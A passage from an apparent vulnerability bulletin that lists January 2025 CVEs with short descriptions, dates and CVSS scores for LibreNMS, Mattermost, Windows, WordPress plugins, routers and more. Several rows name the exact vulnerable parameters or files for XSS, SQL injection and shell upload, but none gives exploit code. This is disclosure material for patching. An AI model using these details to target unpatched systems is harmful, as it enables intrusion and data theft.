A privilege escalation vulnerability was discovered that could allow a valid, authenticated LXCA user to escalate their permissions for a connected XCC instance when using LXCA as a Single Sign On (SSO) provider for XCC instances. | 2025-01-14 | 6.8 | CVE-2024-45102 |
| Lexmark--Printer Firmware |
A new feature to prevent Firmware downgrades was recently added to some Lexmark products. A method to override this downgrade protection has been identified. | 2025-01-17 | 4.3 | CVE-2023-50738 |
| librenms--librenms |
librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to Cross-site Scripting (XSS) on the parameters:`/addhost` -> param: community. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 5.4 | CVE-2025-23201 |
| librenms--librenms |
librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -> param: display. Librenms versions up to 24.11.0 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.12.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 4.6 | CVE-2024-56144 |
| librenms--librenms |
librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -> param: display. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 4.6 | CVE-2025-23198 |
| librenms--librenms |
librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameter: `/ajax_form.php` -> param: descr. Librenms version up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 4.6 | CVE-2025-23199 |
| librenms--librenms |
librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameter: `ajax_form.php` -> param: state. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 4.6 | CVE-2025-23200 |
| libretro--RetroArch |
A vulnerability, which was classified as problematic, has been found in libretro RetroArch up to 1.19.1 on Windows. Affected by this issue is some unknown functionality in the library profapi.dll of the component Startup. The manipulation leads to untrusted search path. An attack has to be approached locally. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-14 | 5.3 | CVE-2025-0459 |
| liujianview--gymxmjpa |
A vulnerability has been found in liujianview gymxmjpa 1.0 and classified as critical. This vulnerability affects the function CoachController of the file src/main/java/com/liujian/gymxmjpa/controller/CoachController.java. The manipulation of the argument coachName leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0404 |
| liujianview--gymxmjpa |
A vulnerability was found in liujianview gymxmjpa 1.0 and classified as critical. This issue affects the function GoodsDaoImpl of the file src/main/java/com/liujian/gymxmjpa/controller/GoodsController.java. The manipulation of the argument goodsName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0405 |
| liujianview--gymxmjpa |
A vulnerability was found in liujianview gymxmjpa 1.0. It has been classified as critical. Affected is the function SubjectDaoImpl of the file src/main/java/com/liujian/gymxmjpa/controller/SubjectController.java. The manipulation of the argument subname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0406 |
| liujianview--gymxmjpa |
A vulnerability was found in liujianview gymxmjpa 1.0. It has been declared as critical. Affected by this vulnerability is the function EquipmentDaoImpl of the file src/main/java/com/liujian/gymxmjpa/controller/EquipmentController.java. The manipulation of the argument hyname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0407 |
| liujianview--gymxmjpa |
A vulnerability was found in liujianview gymxmjpa 1.0. It has been rated as critical. Affected by this issue is the function LoosDaoImpl of the file src/main/java/com/liujian/gymxmjpa/controller/LoosController.java. The manipulation of the argument loosName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0408 |
| liujianview--gymxmjpa |
A vulnerability classified as critical has been found in liujianview gymxmjpa 1.0. This affects the function MembertypeDaoImpl of the file src/main/java/com/liujian/gymxmjpa/controller/MembertypeController.java. The manipulation of the argument typeName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0409 |
| liujianview--gymxmjpa |
A vulnerability classified as critical was found in liujianview gymxmjpa 1.0. This vulnerability affects the function MenberDaoInpl of the file src/main/java/com/liujian/gymxmjpa/controller/MenberConntroller.java. The manipulation of the argument hyname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-13 | 6.3 | CVE-2025-0410 |
| M.J--WP-Player |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in M.J WP-Player allows Stored XSS.This issue affects WP-Player: from n/a through 2.6.1. | 2025-01-16 | 6.5 | CVE-2025-23947 |
| MagePeople Team--WpTravelly |
Missing Authorization vulnerability in MagePeople Team WpTravelly allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects WpTravelly: from n/a through 1.8.5. | 2025-01-15 | 5.3 | CVE-2025-22737 |
| Magic Plugin Factory--Magic Google Maps |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magic Plugin Factory Magic Google Maps allows Stored XSS.This issue affects Magic Google Maps: from n/a through 1.0.4. | 2025-01-16 | 6.5 | CVE-2025-23935 |
| Manuel Costales--GMap Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Manuel Costales GMap Shortcode allows DOM-Based XSS.This issue affects GMap Shortcode: from n/a through 2.0. | 2025-01-16 | 6.5 | CVE-2025-23893 |
| Markus Liebelt--Chess Tempo Viewer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Markus Liebelt Chess Tempo Viewer allows Stored XSS.This issue affects Chess Tempo Viewer: from n/a through 0.9.5. | 2025-01-16 | 6.5 | CVE-2025-23868 |
| Massimo Serpilli--Incredible Font Awesome |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Massimo Serpilli Incredible Font Awesome allows Stored XSS.This issue affects Incredible Font Awesome: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23927 |
| matrix-org--gomatrixserverlib |
Gomatrixserverlib is a Go library for matrix federation. Gomatrixserverlib is vulnerable to server-side request forgery, serving content from a private network it can access, under certain conditions. The commit `c4f1e01` fixes this issue. Users are advised to upgrade. Users unable to upgrade should use a local firewall to limit the network segments and hosts the service using gomatrixserverlib can access. | 2025-01-16 | 4.3 | CVE-2024-52594 |
| Mattermost--Mattermost |
Mattermost Mobile Apps versions <=2.22.0 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post. | 2025-01-15 | 6.5 | CVE-2025-20036 |
| Mattermost--Mattermost |
Mattermost Mobile versions <= 2.22.0 fail to properly validate the style of proto supplied to an action's style in post.props.attachments, which allows an attacker to crash the mobile via crafted malicious input. | 2025-01-16 | 6.5 | CVE-2025-20072 |
| Mattermost--Mattermost |
Mattermost versions 10.2.x <= 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post. | 2025-01-15 | 6.5 | CVE-2025-20086 |
| Mattermost--Mattermost |
Mattermost versions 10.2.x <= 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post. | 2025-01-15 | 6.5 | CVE-2025-20088 |
| Mattermost--Mattermost |
Mattermost versions 10.2.x <= 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly handle posts with attachments containing fields that cannot be cast to a String, which allows an attacker to cause the webapp to crash via creating and sending such a post to a channel. | 2025-01-16 | 6.5 | CVE-2025-20621 |
| Mattermost--Mattermost |
Mattermost Mobile versions <=2.22.0 fail to properly handle posts with attachments containing fields that cannot be cast to a String, which allows an attacker to cause the mobile to crash via creating and sending such a post to a channel. | 2025-01-16 | 6.5 | CVE-2025-20630 |
| Mattermost--Mattermost |
Mattermost Mobile Apps versions <=2.22.0 fail to properly validate post props which allows a malicious authenticated user to cause a crash via a malicious post. | 2025-01-15 | 6.5 | CVE-2025-21083 |
| Mattermost--Mattermost |
Mattermost versions 10.2.x <= 10.2.0, 9.11.x <= 9.11.5, 10.0.x <= 10.0.3, 10.1.x <= 10.1.3 fail to properly validate the style of proto supplied to an action's style in post.props.attachments, which allows an attacker to crash the frontend via crafted malicious input. | 2025-01-15 | 6.5 | CVE-2025-21088 |
| Mattermost--Mattermost |
Mattermost Mobile Apps versions <=2.22.0 fail to properly handle specially crafted attachment names, which allows an attacker to crash the mobile app for any user who opened a channel containing the specially crafted attachment | 2025-01-16 | 4.3 | CVE-2025-0476 |
| Meinturnierplan.de Team--MeinTurnierplan.de Widget Viewer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meinturnierplan.de Team MeinTurnierplan.de Widget Viewer allows Stored XSS.This issue affects MeinTurnierplan.de Widget Viewer: from n/a through 1.1. | 2025-01-16 | 6.5 | CVE-2025-23941 |
| metaphorcreations--Metaphor Widgets |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in metaphorcreations Metaphor Widgets allows Stored XSS. This issue affects Metaphor Widgets: from n/a through 2.4. | 2025-01-16 | 6.5 | CVE-2025-23816 |
| microsoft -- sharepoint_server |
Microsoft SharePoint Server Spoofing Vulnerability | 2025-01-14 | 6.3 | CVE-2025-21393 |
| microsoft -- windows_10_1507 |
Windows CSC Service Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21374 |
| Microsoft--Microsoft Edge (Chromium-based) |
Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | 2025-01-17 | 6.5 | CVE-2025-21185 |
| Microsoft--Microsoft Office 2019 |
Microsoft Outlook Remote Code Execution Vulnerability | 2025-01-14 | 6.7 | CVE-2025-21357 |
| Microsoft--On-Premises Data Gateway |
On-Premises Data Gateway Information Disclosure Vulnerability | 2025-01-14 | 6.4 | CVE-2025-21403 |
| Microsoft--Windows 10 Version 1809 |
Windows Recovery Environment Agent Elevation of Privilege Vulnerability | 2025-01-14 | 6.1 | CVE-2025-21202 |
| Microsoft--Windows 10 Version 1809 |
Secure Boot Security Feature Bypass Vulnerability | 2025-01-14 | 6.8 | CVE-2025-21211 |
| Microsoft--Windows 10 Version 1809 |
Windows NTLM Spoofing Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21217 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21226 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21227 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21228 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21229 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21232 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21249 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21255 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21256 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21258 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21260 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21261 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21263 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21265 |
| Microsoft--Windows 10 Version 1809 |
Windows COM Server Information Disclosure Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21272 |
| Microsoft--Windows 10 Version 1809 |
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability | 2025-01-14 | 6.2 | CVE-2025-21278 |
| Microsoft--Windows 10 Version 1809 |
Windows COM Server Information Disclosure Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21288 |
| Microsoft--Windows 10 Version 1809 |
Windows Geolocation Service Information Disclosure Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21301 |
| Microsoft--Windows 10 Version 1809 |
Windows Themes Spoofing Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21308 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21310 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21324 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21327 |
| Microsoft--Windows 10 Version 1809 |
Windows Digital Media Elevation of Privilege Vulnerability | 2025-01-14 | 6.6 | CVE-2025-21341 |
| Microsoft--Windows 10 Version 1809 |
Windows Kerberos Information Disclosure Vulnerability | 2025-01-14 | 5.9 | CVE-2025-21242 |
| Microsoft--Windows 10 Version 1809 |
Windows WLAN AutoConfig Service Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21257 |
| Microsoft--Windows 10 Version 1809 |
Windows Event Tracing Denial of Service Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21274 |
| Microsoft--Windows 10 Version 1809 |
Windows Virtual Trusted Platform Module Denial of Service Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21280 |
| Microsoft--Windows 10 Version 1809 |
Windows Virtual Trusted Platform Module Denial of Service Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21284 |
| Microsoft--Windows 10 Version 1809 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21316 |
| Microsoft--Windows 10 Version 1809 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21318 |
| Microsoft--Windows 10 Version 1809 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21319 |
| Microsoft--Windows 10 Version 1809 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21320 |
| Microsoft--Windows 10 Version 1809 |
Windows Cryptographic Information Disclosure Vulnerability | 2025-01-14 | 5.6 | CVE-2025-21336 |
| Microsoft--Windows 10 Version 1809 |
Windows Virtualization-Based Security (VBS) Security Feature Bypass Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21340 |
| Microsoft--Windows 10 Version 1809 |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21189 |
| Microsoft--Windows 10 Version 1809 |
Windows BitLocker Information Disclosure Vulnerability | 2025-01-14 | 4.2 | CVE-2025-21210 |
| Microsoft--Windows 10 Version 1809 |
Secure Boot Security Feature Bypass Vulnerability | 2025-01-14 | 4.6 | CVE-2025-21213 |
| Microsoft--Windows 10 Version 1809 |
Windows BitLocker Information Disclosure Vulnerability | 2025-01-14 | 4.2 | CVE-2025-21214 |
| Microsoft--Windows 10 Version 1809 |
Secure Boot Security Feature Bypass Vulnerability | 2025-01-14 | 4.6 | CVE-2025-21215 |
| Microsoft--Windows 10 Version 1809 |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21219 |
| Microsoft--Windows 10 Version 1809 |
Windows HTML Platforms Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21269 |
| Microsoft--Windows 10 Version 1809 |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21328 |
| Microsoft--Windows Server 2019 |
Active Directory Federation Server Spoofing Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21193 |
| Microsoft--Windows Server 2019 |
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability | 2025-01-14 | 5.9 | CVE-2025-21225 |
| Microsoft--Windows Server 2022 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21317 |
| Microsoft--Windows Server 2022 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21323 |
| Microsoft--Windows Server 2025 (Server Core installation) |
Windows Security Account Manager (SAM) Denial of Service Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21313 |
| Microsoft--Windows Server 2025 (Server Core installation) |
Windows SmartScreen Spoofing Vulnerability | 2025-01-14 | 6.5 | CVE-2025-21314 |
| Microsoft--Windows Server 2025 (Server Core installation) |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21268 |
| Microsoft--Windows Server 2025 |
Windows Kernel Memory Information Disclosure Vulnerability | 2025-01-14 | 5.5 | CVE-2025-21321 |
| Microsoft--Windows Server 2025 |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21329 |
| Microsoft--Windows Server 2025 |
MapUrlToZone Security Feature Bypass Vulnerability | 2025-01-14 | 4.3 | CVE-2025-21332 |
| Mohsin Rasool--Twitter Bootstrap Collapse aka Accordian Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mohsin Rasool Twitter Bootstrap Collapse aka Accordian Shortcode allows DOM-Based XSS.This issue affects Twitter Bootstrap Collapse aka Accordian Shortcode: from n/a through 1.0. | 2025-01-15 | 6.5 | CVE-2025-22743 |
| MojofyWP--Product Carousel For WooCommerce WoorouSell |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MojofyWP Product Carousel For WooCommerce - WoorouSell allows Stored XSS.This issue affects Product Carousel For WooCommerce - WoorouSell: from n/a through 1.1.0. | 2025-01-15 | 6.5 | CVE-2025-22724 |
| mondula2016--Multi Step Form |
The Multi Step Form plugin for WordPress is vulnerable to unauthorized limited file upload due to a missing capability check on the fw_upload_file AJAX action in all versions up to, and including, 1.7.23. This makes it possible for unauthenticated attackers to upload limited file types such as images. | 2025-01-16 | 5.3 | CVE-2024-12427 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Cross Site Scripting (XSS) via the WSCView/Save function. | 2025-01-13 | 6.1 | CVE-2023-42230 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Cross Site Scripting (XSS) via the Filter/FilterEditor function. | 2025-01-13 | 6.1 | CVE-2023-42233 |
| n/a--n/a |
Selesta Visual Access Manager < 4.42.2 is vulnerable to Cross Site Scripting (XSS) via monitor/s_scheduledfile.php. | 2025-01-13 | 6.1 | CVE-2023-42245 |
| n/a--n/a |
Selesta Visual Access Manager < 4.42.2 is vulnerable to Cross Site Scripting (XSS) via /vam/vam_ep.php. | 2025-01-13 | 6.1 | CVE-2023-42246 |
| n/a--n/a |
Selesta Visual Access Manager < 4.42.2 is vulnerable to Cross Site Scripting (XSS) via monitor/s_monitor_map.php. | 2025-01-13 | 6.1 | CVE-2023-42247 |
| n/a--n/a |
Selesta Visual Access Manager < 4.42.2 is vulnerable to Cross Site Scripting (XSS) via vam/vam_visits.php. | 2025-01-13 | 6.1 | CVE-2023-42249 |
| n/a--n/a |
Selesta Visual Access Manager < 4.42.2 is vulnerable to Cross Site Scripting (XSS) via /common/autocomplete.php. | 2025-01-13 | 6.1 | CVE-2023-42250 |
| n/a--n/a |
BigId PrivacyPortal v179 is vulnerable to Cross Site Scripting (XSS) via the "Label" field in the Report template function. | 2025-01-13 | 6.1 | CVE-2024-44771 |
| n/a--n/a |
An issue was discovered in Samsung Mobile Processor Exynos 9820, 9825, 980, 990, 850, 1080, 2100, and 1280. Lack of a length check leads to a stack out-of-bounds write at loadInputBuffers. | 2025-01-13 | 6.5 | CVE-2024-46920 |
| n/a--n/a |
The ip_mod_dns_key_form.cgi request in GestioIP v3.5.7 is vulnerable to Stored XSS. An attacker can inject malicious code into the "TSIG Key" field, which is saved in the database and triggers XSS when viewed, enabling data exfiltration and CSRF attacks. | 2025-01-14 | 6.1 | CVE-2024-50861 |
| n/a--n/a |
MonicaHQ v4.1.2 was discovered to contain a Client-Side Injection vulnerability via the last_name parameter the General Information module. | 2025-01-13 | 6.5 | CVE-2024-54999 |
| n/a--n/a |
Cross Site Scripting vulnerability in InformationPush master version allows a remote attacker to obtain sensitive information via the title, time and msg parameters | 2025-01-17 | 6.1 | CVE-2024-57372 |
| n/a--n/a |
In Code-Projects Online Car Rental System 1.0, the file upload feature does not validate file extensions or MIME types allowing an attacker to upload a PHP shell without any restrictions and execute commands on the server. | 2025-01-13 | 6.5 | CVE-2024-57487 |
| n/a--n/a |
Code-Projects Online Car Rental System 1.0 is vulnerable to Cross Site Scripting (XSS) via the vehicalorcview parameter in /admin/edit-vehicle.php. | 2025-01-13 | 6.5 | CVE-2024-57488 |
| n/a--n/a |
An issue in the qst_vec_set_copy component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 6.5 | CVE-2024-57653 |
| n/a--n/a |
An issue was discovered in Samsung Mobile Processor Exynos 9820, 9825, 980, 990, 850, 1080, 2100, and 1280. Lack of a length check leads to a stack out-of-bounds write at loadOutputBuffers. | 2025-01-13 | 5.3 | CVE-2024-46919 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in Arcadyan Meteor 2 CPE FG360 Firmware ETV2.10 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload. | 2025-01-14 | 5.4 | CVE-2024-53563 |
| n/a--n/a |
Sourcecodester House Rental Management system v1.0 is vulnerable to Cross Site Scripting (XSS) in rental/manage_categories.php. | 2025-01-14 | 5.4 | CVE-2024-55000 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the speed_dir parameter in the formSetSpeedWan function. | 2025-01-16 | 5.7 | CVE-2024-57577 |
| n/a--n/a |
Tenda AC18 V15.03.05.19 was discovered to contain a stack overflow via the funcpara1 parameter in the formSetCfm function. | 2025-01-16 | 5.7 | CVE-2024-57578 |
| n/a--n/a |
A cross-site scripting (XSS) vulnerability in Process Maker pm4core-docker 4.1.21-RC7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter. | 2025-01-15 | 4.8 | CVE-2024-41453 |
| n/a--n/a |
An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 9820, 9825, 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 9110, W920, W930, W1000, Modem 5123, and Modem 5300. The UE incorrectly handles a malformed uplink scheduling message, resulting in an information leak of the UE. | 2025-01-13 | 4.3 | CVE-2024-48883 |
| n/a--n/a |
The ip_do_job request in GestioIP v3.5.7 is vulnerable to Cross-Site Scripting (XSS). It allows data exfiltration and enables CSRF attacks. The vulnerability requires specific user permissions within the application to exploit successfully. | 2025-01-14 | 4.8 | CVE-2024-50857 |
| n/a--n/a |
The ip_import_acl_csv request in GestioIP v3.5.7 is vulnerable to Reflected XSS. When a user uploads an improperly formatted file, the content may be reflected in the HTML response, allowing the attacker to execute malicious scripts or exfiltrate data. | 2025-01-14 | 4.8 | CVE-2024-50859 |
| n/a--n/a |
OtCMS <=V7.46 is vulnerable to Server-Side Request Forgery (SSRF) in /admin/read.php, which can Read system files arbitrarily. | 2025-01-17 | 4.3 | CVE-2024-57252 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the spf_table_content component of Linksys E5600 Router Ver. 1.1.0.26 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the desc parameter. | 2025-01-15 | 4.8 | CVE-2025-22996 |
| n/a--n/a |
A stored cross-site scripting (XSS) vulnerability in the prf_table_content component of Linksys E5600 Router Ver. 1.1.0.26 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the desc parameter. | 2025-01-15 | 4.8 | CVE-2025-22997 |
| n/a--wuzhicms |
A vulnerability classified as problematic has been found in wuzhicms 4.1.0. This affects the function test of the file coreframe/app/search/admin/config.php. The manipulation of the argument sphinxhost/sphinxport leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 4.3 | CVE-2025-0480 |
| naa986--Checkout for PayPal |
The Checkout for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'checkout_for_paypal' shortcode in all versions up to, and including, 1.0.32 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 6.4 | CVE-2024-13398 |
| naa986--Payment Button for PayPal |
The Payment Button for PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_paypal_checkout' shortcode in all versions up to, and including, 1.2.3.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 6.4 | CVE-2024-13401 |
| Nasir--Scroll Top Advanced |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nasir Scroll Top Advanced allows Stored XSS.This issue affects Scroll Top Advanced: from n/a through 2.5. | 2025-01-16 | 6.5 | CVE-2025-23444 |
| Nativery Developer--Nativery |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nativery Developer Nativery allows DOM-Based XSS.This issue affects Nativery: from n/a through 0.1.6. | 2025-01-15 | 6.5 | CVE-2025-22781 |
| NCiphers--SEO Bulk Editor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NCiphers SEO Bulk Editor allows Stored XSS.This issue affects SEO Bulk Editor: from n/a through 1.1.0. | 2025-01-15 | 6.5 | CVE-2025-22587 |
| NEC Corporation--WX1500HP |
NEC Corporation Aterm WX1500HP Ver.1.4.2 and earlier and WX3600HP Ver.1.5.3 and earlier allows a attacker to execute arbitrary OS commands via the network. | 2025-01-15 | 4.8 | CVE-2025-0356 |
| Nikos M.--Top Flash Embed |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nikos M. Top Flash Embed allows Stored XSS.This issue affects Top Flash Embed: from n/a through 0.3.4. | 2025-01-16 | 6.5 | CVE-2025-23841 |
| nitethemes--Nite Shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in nitethemes Nite Shortcodes allows Stored XSS.This issue affects Nite Shortcodes: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23877 |
| nitropack--NitroPack Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN |
The NitroPack plugin for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the nitropack_rml_notification function in all versions up to, and including, 1.17.0. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to integers and not arbitrary values. | 2025-01-15 | 4.3 | CVE-2024-11851 |
| nmedia--Admin and Customer Messages After Order for WooCommerce: OrderConvo |
The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to limited file uploads due to insufficient file type validation in the upload_file() function in all versions up to, and including, 13.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload files on the affected site's server which may make remote code execution possible and is confirmed to make Cross-Site Scripting possible. | 2025-01-16 | 5.4 | CVE-2024-13355 |
| notaryproject--notation-go |
